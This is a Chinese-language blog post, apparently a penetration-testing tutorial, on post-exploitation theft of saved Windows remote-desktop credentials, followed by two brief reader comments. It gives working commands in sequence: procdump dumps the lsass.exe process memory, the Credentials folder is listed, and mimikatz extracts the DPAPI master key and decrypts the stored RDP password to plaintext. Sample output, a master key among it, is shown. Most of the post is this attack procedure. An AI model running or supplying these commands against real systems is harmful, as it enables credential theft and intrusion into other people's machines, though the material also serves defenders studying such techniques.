后渗透:远程凭据获取

当我们拿到服务器权限时,往往会更深层次的渗透,在建立据点的时候,往往会分析到底是横向还是纵向,在开始之前会进行一些信息收集,使用procdump+mimikatz可以一步到位的获取到远程链接凭证。

何为凭证:

在个人电脑使用mstsc进行远程链接时会输入所需账户密码,可能有些人觉得麻烦就会选择保存凭证信息,在下次链接时就不需要再次输入用户名密码,但是此操作会在本地保存一份凭证。如果有人进入到了该服务器,反之:就会产生一种连锁反应。

凭证的获取:

在windows桌面下可以使用 procdump+mimikatz 一步到位,具体流程

1.procdump 请使用管理员权限运行

procdump64.exe -accepteula -ma lsass.exe lsass.dmp

先使用procdump读取lsass.exe进程里面的内容,lsass.exe时本地安全和远程登录策略

得到以下回显:

ProcDump v8.0 - Writes process dump files
Copyright (C) 2009-2016 Mark Russinovich
Sysinternals - www.sysinternals.com
With contributions from Andrew Richards

[22:57:53] Dump 1 initiated: C:\Users\YuanHaiDesktop\Desktop\[22:57:53] Dump 1 writing: Estimated dump file size is 84 MB.
[22:57:53] Dump 1 complete: 84 MB written in 0.2 seconds
[22:57:53] Dump count reached.

会在当前目录下产生一个lsass.dmp文件。

2.获取远程凭证

这里我用本机做的测试。先在cmd中查看Credentials目录下是否有保存凭证

dir /a %userprofile%\AppData\Local\Microsoft\Credentials\*

如果有列出文件,说明有保存的凭证,进入%userprofile%\AppData\Local\Microsoft\Credentials\文件夹将其下载下来

注意:如果cmd中有列出文件,但在文件中无法看到,请在查看选项里取消隐藏系统文件。

3.记录guidMasterKey的值

将刚刚下载出来的文件保存在固定位置:使用mimikatz读取

dpapi::cred /in:凭证路径

将回显内容里面的guidMasterKey记录下来,等会要用

guidMasterKey      : {d44e6e16-1235-47d8-b333-a9df5a6abf93}

4.读取MasterKey

先使用mimikatz绑定刚刚dump出来的lsass.dump

sekurlsa::minidump lsass.dmp

然后读取里面的内容

sekurlsa::dpapi

找到刚刚记录下来的guidMasterKey对应的guid


记录对应MasterKey

e684e4e6063adb32554282c44732e951df2076b3e07d857a2eb0174f68713039c01de51135af67cdd5fe87c2c8ba8c8b7c84ac950be94c82f872621401fcf034

5.解密内容,获取远程凭证信息

上面获取到了对应的GuidMasterKey和对应的MaserKey后,我们就可以进行解密

dpapi::cred /in:远程凭证文件地址 /masterkey:记录下来的MasterKey

就可以得到相应的password,还是明文

TargetName     : Domain:target=TERMSRV/主机地址
  UnkData        : (null)
  Comment        : (null)
  TargetAlias    : (null)
  UserName       : administrator
  CredentialBlob : 密码
  Attributes     : 0

本文链接:

https://www.websecuritys.cn/index.php/archives/183/
1 + 5 =
2 评论
    --+qweChrome 86Windows 10
    2020年10月23日 回复

    这个讲的应该是拿到shell的后渗透吧,感觉跟域渗透中的黄金票据很像。

      yuanhaiChrome 86Windows 10
      2020年10月23日 回复

      @--+qwe 是的。